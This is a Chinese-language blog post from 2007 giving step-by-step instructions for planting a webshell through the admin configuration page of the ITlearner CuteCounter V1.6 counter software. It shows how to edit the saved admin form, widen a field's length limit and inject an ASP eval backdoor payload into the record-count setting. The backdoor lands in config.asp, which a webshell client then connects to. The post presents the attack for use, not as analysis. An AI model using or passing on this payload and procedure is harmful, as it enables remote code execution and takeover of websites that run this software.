数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



ITlearner CuteCounter V1.6后台获得webshell
樱木花盗 发表于 2007-12-22 13:48:54
 

进入http://url/admin.asp?action=ShowConfig,查看原代码

查找<td><input name="RecordNum" type="text" id="RecordNum" value="100" size="40" maxlength="3"></td>

修改maxlength="3"为maxlength="50">

然后查找 <form name="form1" method="post" action="?Action=SaveConfig">处

修改为action="http://url/admin?Action=SaveConfig">

存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35))

此处没有哪个"的然后保存设置后提示成功后

用海洋eval连接http://url/config.asp文件就获得一个webshell!  


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.